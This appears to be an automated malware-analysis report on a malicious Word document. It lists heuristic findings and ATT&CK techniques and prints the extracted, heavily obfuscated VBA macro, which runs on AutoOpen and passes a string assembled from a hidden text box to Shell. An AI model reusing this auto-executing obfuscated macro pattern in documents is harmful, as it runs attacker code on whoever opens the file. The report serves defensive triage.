Verdict: MALICIOUS
Risk Score: 252
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains VBA macros, including an auto-execute macro named 'autoopen'. Heuristics indicate a 'Shell()' call within the VBA code, suggesting it attempts to execute external commands or download additional payloads. The ClamAV detection and generic malware heuristic further support its malicious nature. The VBA script itself is heavily obfuscated, making it difficult to determine the exact payload or destination.
Heuristics (9)

- ClamAV: Doc.Malware.Generic-6786413-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Generic-6786413-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Potential Shell call in VBA (critical, OLE_VBA_SHELL): Potential Shell call in VBA. Matched lines in script:
    Set ZcmUsibLjkCjGXpPfwVQ = abjSZlJEZzZjfJh
    tADaJcG = Array(qCDtM, siZiMLOzd, RTHcHGHX, Interaction.Shell(tMUuDDDScz, wGWANA), wjbEi)
    Select Case sLsANPmMRzjknOdXM
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched lines in script:
    Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
    Sub autoopen()
    QWKuwsv
- Suspicious cmd.exe invocation with execution flag (high, SC_STR_CMD): Suspicious cmd.exe invocation with execution flag
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    - http://schemas.openxmlformats.org/officeDocument/2006/bibliography (in document text, OLE body)
    - http://schemas.openxmlformats.org/officeDocument/2006/customXml (in document text, OLE body)
    - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9881 bytes |

SHA-256: 07f3c12b9e7f55947718ee262803c2e05b5588632317d887736f57eabe253d74

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. 266 of 310 identifiers look randomly generated (e.g. 'LmddEIUwFqOWwuTbGbWIRdsO'), consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "rUPPOfMwM"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
QWKuwsv
End Sub
Attribute VB_Name = "qScIRduGDDlRdq"
Function QWKuwsv()
On Error Resume Next
Select Case VdZvwGHLTiPjXudMA
Case 268361738
AoZPsKHLnLFVmrqTmIr = KaPpLdBwpXtdYAd
wNhlruUANIdshaqDIiO = Log(ZjDOIIVPRczlNOWZbGP)
GPbDAIRPhqUqlECMJ = 123348243
iZFilKsfSERcCTzTKIAO = qGhaHHzJMJPIdjpBjpsIdzKQ
Case 93549604
WmksEJEcsTXIdDsWF = 305435403
TYmJSiSIGWqvRM = Log(kNYTFFEAnWiXLpPHtQOutj)
SOlBzGBYFvoSfzmpwPYw = 256411929
GGSqPziDSvAkFFTEGumwYc = Log(XkJHbRiUkpiIiiGqEt)
End Select
Set dsRusjVsIiMoPi = vGFpDlnaQuazpVzDhFVwi
Select Case WMKtjoRwmuvKzTqwQ
Case 329390411
OMKqjoYiDqKFvicqkTMEDu = iWJdFmfXwPazBLVdFHFOIbp
bWdFcEtmUScUXK = Log(wXSLpViaiPpGwwflH)
JBjJauuVoijjAGvpIrpP = 339806470
swwqnwwopjUnNIjnzYRT = DrvOiLHpowrhiImKjHwZ
Case 1435083
COMtmFVtQzfwoEDbEmowBj = 193339947
jzwcNRVujOojBpY = Log(TuftBfTiHICJlB)
SlGKmItjzclRaQWZPOmiHE = 235439647
DjOUEOMIfaVvvfl = Log(aNfQQOtRlimuwWhOBBGGuYb)
End Select
Set QcmAuaikcsDtYSoomwiWb = KItHutYfzClvAnctX
Select Case ZDMPtSUwqwjwzsFZhJHFQmm
Case 65934951
LTpXslboYXIEVza = VDmPVTWwifuhuanQCGiwiaz
IHbVzVMLjOviAunr = Log(qpNrtuwjrBPPcMvGbHNsBBNS)
BffFPISqAokkTOMclFUzv = 27499119
zcZnZzvpcuIsPS = btwZbXKVHsBPPvtVmwcf
Case 190807886
VsrEwIqLWzKHibAWcipHRuY = 233709430
tjZVvmnBkXEhWZBivWDF = Log(RSUQUwpVZaTHYFZ)
qaKWFtDwoFFncVXUd = 154266677
REFbnzfLzkazTcNFwsi = Log(YOXbOtBtDCwdBi)
End Select
Set MlzWZahFLOHmLOQ = cuUDCjdMuvlIulwwpUB
Const wGWANA = 0
Select Case WIEtjBTjXDNRin
Case 227496870
shtpzwmWXsfHXSTnKb = uCsrPBrkSjbzrjufkbzCX
hWnVLJEjZHCDnQAqin = Log(OTqvsoadmiMLZMY)
VDtpifiGUzosifuzLu = 63648050
ravhkfSBNwcqPv = nkwZiljbvzhzGnOziDWc
Case 312528828
MECNjsYUwdiBGNN = 140252576
QIwAhCjLNwwwnsTifXt = Log(UFqCaBEQFhBmJbGUwI)
CVCStcWKlPSbpUwGLRvZ = 212703578
QFjzJoLmwmXsqBSmzaDqSBnF = Log(SKVvDAiwDFwmwTiz)
End Select
Set QjEwdznYUVWpfOSbkqdprulp = nvVAAHUrTkHAPpNhWjfLIXq
Select Case AUwlkfSqVMRfNPLFaYSmjB
Case 95984365
BWUFFlspbrRjOHoszicrYa = vUBldutCzGKkOL
kkTbEVwfqSjanAYW = Log(aSYkEAPvhoSaEXajm)
sYwWizpKStTGBbjuKwncjjEj = 147125346
fEmvJtACfwSDkavuiVbbn = qJMitJRJTQABSkXWjaFzwlb
Case 40211087
NhlBiFvuoOcifArk = 144337737
CDjILWLmBVnuFhGRjcjH = Log(KFGdVuoEZNOaGZCdEWOqw)
ZGtIvbNTPENtsw = 184911057
pcWhbIZUzIEobFRRoGjA = Log(NzMrFwJMMhDBZhmTOcQjZ)
End Select
Set mXYsJnwElSbvbcJq = JQImbAnBYizadPUKDM
Select Case KLMTkrboBnKnlRa
Case 321897390
ifilRAPwoIBEsWvpUaE = YFzDbjXEZAuZOpPkiXtKzUv
ajJROwQrVEBdhfJlcLZoN = Log(pCHLGzhuuDJOdsWGpaj)
EKnlCDNIhmvHVw = 300629582
KDsTJbJwUTCROWV = FJXfPVIDjZMIICtiwQwliPuc
Case 636384
RjBwtLQwCLaNrovokjOBpS = 171842369
SzZkQpPvfZEZCmfBsL = Log(hDkZIqtfKNwzwJddwmffMwfh)
kVmzENIdSsThYQtXK = 29557487
jZFQYJjOMjnkXDHXUHhGA = Log(WjQKwXVmICswBsfFNoUwvz)
End Select
Set IviRtZQczhqDYzONLtaX = sZCOsOtslBuYBIORGcNsZ
Select Case roDbDVpikOJjOzfCoHtjROl
Case 190986733
BdSikVfQzIGCpKKVP = cPCtulaHSFWadDaMBr
zAtdSPrYAwwjOCqINM = Log(jjIcDatYiDccISz)
WjlkdDNZJVVIYnuNA = 301892010
rrYpCYrMVYWnRQm = ZbcdfTiSiFlArIObPJ
Case 41015626
zuiLmqrBnhErlTVmYQd = 159555097
GGznqVMJuYHKNWf = Log(QqpbjfBBtOXncDwjhPrnlYw)
fssIwjYwqtIZnzbaFv = 298656969
zZjrZbczisGruUwonsF = Log(qbzjuZskoRhpfUWF)
End Select
Set BiUEaRznQiSAnnNq = lWczwAirJNKQMZwqdmKk
Select Case qQANPNEsEkXSdSfnl
Case 329173713
KpzCKdMLiNpHId = iGRzZzNFMLTZIuju
fHnasNqkDBZfOcPoTkYWnY = Log(zjkrqEDQvSCbAp)
psbMWznaziEkpKLYwGEqr = 53747068
zjzliMMAOzkvfubCGJ = mIlTOGjuDUvzshW
Case 181466487
WLJNliplEPfdXEwjiVOO = 83940220
fuSJfSzsOJTufuAvBZviJ = Log(EQfQzSJLINTmjOubCXlMAWK)
ZDjnUoSiboqCdPVhiCBF = 176573873
NlAZXYwwqiFCqtlWrTvpKsY = Log(wnBEiwUECjpvmuQthiwHwbY)
End Select
Set vMLhKliVMIbkWsSrNBA = DpjwCBHjuRvWOaIR
Select Case LmddEIUwFqOWwuTbGbWIRdsO
Case 19775909
RHZWmbLODvwUrplQSkcid = IqnzrdiitPaXrMWjDmKiqYdm
hXAKHmUEUwjjnkifUBitU = Log(YtjhpYvGkMBPKGhYldGTWOnz)
CcCWWusQiwHaawvJO = 90222023
iYZbzvPFnBbKGjRnvs = NSIzbHawLjKJIAQRrcAFa
Case 49117970
EOHoAqJJARizEZYzUXzEYc = 284798461
JpSZKvmJGdDkUSZHBX = Log(sdAMsSffidDQcXnf)
YkzEiVtaVodCzpDB = 118082263
pIdaGfPEjDNbMjnOjRYGOIHm = Log(iBdknAPKZwWhwdUoZo)
End Select
Set NubwOiFlcLkhBrDbdmTsDw = niQhlnERoTQYbDEOB
Select Case nWzvADCoYIkmwtnROK
Case 176096445
KBUosBozXkIiMjn = NJVshMfQWwQqSoPLDLL
CLDzPCRoAFZPFPEFohYzW = Log(SvkwhjVwaBVCWB)
WdfurQQXAkDkJWW = 260218827
PwsIOQViTDfYuDtC = SDsCfnCYjNiwLZENImXIzHMK
Case 82752683
MlwGjJhJESuKkLqjfDr = 233356103
daKmQWtCLqiqHaQ = Log(cjURBVmSzCLSNcJTdQi)
oUQnoHtbMUdlZKCW = 151012705
FHnroOLboihPNqrFl = Log(QjducLGdZZsDZmw)
End Select
Set LbXwjBcMTKtzHmuU = uGqpLfblLoljkJuSCfQ
Select Case jfUmiHBNmsQSdQiB
Case 252145989
NoTzOilhiLlSbXlSZcJzFKq = lswszZXEYNQZtiQmAwc
bUQsjLqCsmnCzuLVlthFoj = Log(OHLZqLWzIiAzRcDLniULmZN)
wXuBGOXBvaClUmArWmf = 135237765
ztthiuWTVHpujaTQVttKzCra = qBidpzusfBdBTYUBh
Case 171879499
MqlLjaAtlJzuCTOrs = 258115972
fIvBEZqOBVYJRcZNbFpCCoG = Log(jhGaiEjcOruKRpj)
qLzYMAfScFnlCknqBmSWSP = 213986383
owvahPwmZCMrpiwiBnzcRuZd = Log(EIiXJUafBjPFFl)
End Select
Set JAMAYwATqjViRDft = RWdHRPPilMowjdwCkT
tMUuDDDScz = rUPPOfMwM.TextBox1 + IbVqsniI + EHDoon + lzRmkMVJ + aScbbt + chkPLz + SHopNud + kHSWqTf + hoQJVY + NbrGfu + uNURLhDJ
Select Case rffpIcvPWkoEoWuX
Case 301760683
zRFqkdcNjsonNUufdkmoVWD = hKjItsHjmVJWGB
CNuwCaiWTJItKkFYaNEIatT = Log(olIBsLYZcpjaaaBawn)
wkwzwhziJBsUJtbIR = 122720987
iIljQUAiwAMdKmcVipnMU = cOXjUahzSjHRJHNBhcvCwiw
Case 157697725
ijYsTdGMjjWMhzazzidWs = 189240107
HhHLQRvtRzBltIHwFA = Log(ZaqoAdVFzATBpG)
QKMSqvonFNfNjosj = 153965485
oDvRsGivMwszzMfjsw = Log(nKJlnkbVPpQHRwjACPzRGk)
End Select
Set iruHPSizwvzkKfSHjRkSGvo = BRLdTsijCQatsdMDhsU
Select Case QVOwOLGmVnrmfI
Case 341167931
LpXpjVOzrHEqASNVjNnK = jHszsEKwhiBsdus
lRvGPGGHQmDZWCSV = Log(VbifsrQDAJZDzWYVIwvrDt)
AlhGBlcfQjDISKhsaiDO = 323767298
DSPiENEWdlbwhtLkPSYiI = tOFKaFUNAifShOrWjO
Case 176538295
DSjUdnhqPlqSZhYAZtnwBPk = 321923028
OMwtslJDOTahlhmXi = Log(OnNtApqwnbbsnhjBObkwWAhO)
NzSoMAbWRWJFULHC = 314750145
icVftwjSLmhbOGwimrYIabAW = Log(LavuQduaCzmpiEUEtp)
End Select
Set oqHCGmYPinXHbzJhXoYvIn = MHMtEmDEjlLhfD
Select Case IKjGiHwCIVRsvNQHdtqsqjB
Case 192651035
fjkWkXDZGRDazMQfuibFWa = rosqsKDcJDRDaOfXwOS
wMjdhZNvwZXSEItirjLODp = Log(XhIqRPKdrDlciHOJSzHijjw)
SUwfRCElGSJwYjvjnwfOSfOb = 190083729
tQvKKriKXwSiLozzVM = SkiCaqnAkfnGVDuJnqwHSNOL
Case 339633327
IlrOSJCdKmKOUUXqw = 199423524
qzbQiMJZEfFWXCMhCJVNd = Log(ssHzZVckbPkaJR)
UMCIkwzFQnMImVhcRHmEi = 59532182
mozTEpmwsvAhzSEtFvnq = Log(NMpOumSTXMwLjPUm)
End Select
Set tPirTMmnkKMNjJvSTZbH = KDTcVjBWQCkGaCY
Select Case NwcORuDfbQLsPvofaM
Case 174632917
RCQMScmGvSRjpjrk = zJhEJUZhSKiVGBaP
FLjPvoIwjIwcDjED = Log(aCsHIiqfAREkpRrTcb)
EuEVZHZLbFPbiSkaYWFz = 192254998
kvWDLurHIaIYwbWhSziWPZ = qaSEqTzWdCPJIzVwfTTzo
Case 130189781
TIEqDGOGaKKjdsp = 4647096
KEiVjSNizDCCwcwWUzwlct = Log(PwowzSrDpTimkpjjq)
IGCLDihOJJtsOMRoOZuTPPF = 339489497
jRqLjkQGuTnNDsKR = Log(JiKzESVvaKoWctBDwTNrC)
End Select
Set ZcmUsibLjkCjGXpPfwVQ = abjSZlJEZzZjfJh
tADaJcG = Array(qCDtM, siZiMLOzd, RTHcHGHX, Interaction.Shell(tMUuDDDScz, wGWANA), wjbEi)
Select Case sLsANPmMRzjknOdXM
Case 139368420
mzQAZJZjYkvXBUQ = XYnwzrDEaELjLOkESIXRb
TrofNcVciQWhGzZW = Log(vvMZVzpYKzrEtzz)
MFvKUdbiwWvMiIl = 206634134
AbVOlwtwHDciXoSXbuudMnRU = awBdtBOLItWdraGCLMaz
Case 24918761
hdpDOqBjMKBkLzrVNBN = 125216003
vwtjTnbAarVazQYoq = Log(XJYjLcGPHKqzYlkMmhvTuD)
jlSjKLiShXNqJqOkRdD = 214843742
JbTjpnirsWtUjpvtv = Log(DYrJcKvbVYwdqqWKZKzwVYEb)
End Select
Set AUWZBSrVhAIYAzIoNRFuPj = zYPltzaiTQVcpZ
Select Case oLEsjFlVKGjYukS
Case 274487950
CbBGlZCNdYhUZZsSfHUiUZ = oaXfPUXMTwZsJdwD
CfGjDAkjqFPdzHVcPMfNu = Log(tFMNWAhipjEjfpTikamzYP)
jWrEPtRSprQlAUq = 195746616
wHQiZNbfJlbFauOizcriv = oYNOrPDSKuwCBQzZJ
Case 56366749
ZFIpMOzCHDrwwpfSr = 135781368
WMbqbhJYtzfXSiPW = Log(jjAzuNwPSvzNVwHF)
mDzPhHDqDEcjYQjSSmITKbwf = 179252908
lLLXzYSTwLYzwbz = Log(qITjtfNuCLwloKES)
End Select
Set ZWrijFEOFTYuVohWBkqLsP = wRVnZjflGGJZEFf
End Function